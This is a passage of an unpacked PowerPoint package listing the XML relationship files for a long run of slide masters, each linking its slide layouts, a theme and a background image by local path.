Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2141.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster216.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2159.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2158.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2157.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2156.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2155.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2154.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2153.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2152.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme216.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2160.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2151.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster217.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2169.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2168.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2167.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2166.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2165.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2164.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2163.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2162.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme217.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2170.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2161.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster218.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2179.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2178.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2177.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2176.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2175.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2174.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2173.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2172.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme218.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2180.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2171.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster219.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2189.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2188.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2187.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2186.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2185.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2184.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2183.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2182.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme219.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2190.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2181.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout219.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout218.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout217.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout216.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout215.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout214.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout213.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout212.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme22.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout220.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout211.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster220.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2199.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2198.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2197.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2196.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2195.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2194.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2193.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2192.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme220.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2200.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2191.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster221.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2209.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2208.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2207.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2206.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2205.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2204.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2203.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2202.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme221.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2210.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2201.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster222.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2219.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2218.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2217.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2216.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2215.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2214.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2213.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2212.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme222.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2220.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2211.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster223.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2229.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2228.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2227.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2226.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2225.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2224.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2223.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2222.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme223.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2230.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2221.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster224.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2239.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2238.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2237.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2236.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2235.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2234.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2233.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2232.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme224.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2240.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2231.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster225.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2249.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2248.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2247.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2246.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2245.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2244.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2243.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2242.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme225.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2250.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2241.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster226.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2259.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2258.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2257.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2256.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2255.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2254.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2253.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2252.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme226.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2260.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2251.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster227.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2269.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2268.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2267.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2266.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2265.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2264.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2263.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2262.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme227.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2270.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2261.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster228.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2279.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2278.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2277.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2276.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2275.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2274.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2273.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2272.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme228.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2280.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2271.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster229.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2289.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2288.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2287.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2286.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2285.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2284.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2283.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2282.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme229.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2290.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2281.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout229.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout228.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout227.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout226.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout225.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout224.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout223.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout222.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme23.xml"/><Relationship Id="rId11" 